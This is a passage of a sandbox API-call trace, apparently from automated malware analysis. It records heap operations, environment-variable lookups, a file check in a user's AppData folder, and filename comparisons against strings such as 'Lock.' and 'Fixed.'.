[0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0113.335] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0113.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0113.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0113.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0113.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0113.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0113.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0113.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0113.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0113.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0113.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0113.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0113.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0113.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0113.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0113.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a68440 [0113.337] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/1px3r9YZM.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\1px3r9YZM.gif", lpFilePart=0x8cf650*="1px3r9YZM.gif") returned 0x2d [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0113.337] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\1px3r9YZM.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\1px3r9yzm.gif")) returned 0xffffffff [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0113.337] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0113.337] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.337] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0113.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0113.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0113.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0113.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0113.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0113.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0113.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0113.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0113.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0113.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5sRVNiax4.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0113.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sRVNiax4.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0113.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RVNiax4.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0113.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VNiax4.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0113.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Niax4.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0113.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iax4.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0113.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ax4.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0113.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x4.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0113.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0113.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0113.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0113.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0113.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0113.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0113.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0113.338] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0113.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0113.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0113.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0113.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0113.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0113.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0113.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0113.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0113.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0113.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0113.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0113.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0113.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0113.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77cb0 [0113.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0113.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5sRVNiax4.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0113.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sRVNiax4.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0113.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RVNiax4.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0113.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VNiax4.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0113.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Niax4.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0113.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iax4.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0113.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ax4.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0113.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x4.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0113.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0113.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0113.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0113.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0113.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0113.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0113.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0113.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0113.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0113.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0113.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0113.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0113.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0113.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0113.340] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0113.340] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0113.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0113.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0113.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0113.340] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0113.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0113.341] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0113.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0113.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0113.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0113.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0113.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0113.342] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0113.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0113.342] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0113.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0113.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0113.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0113.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0113.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 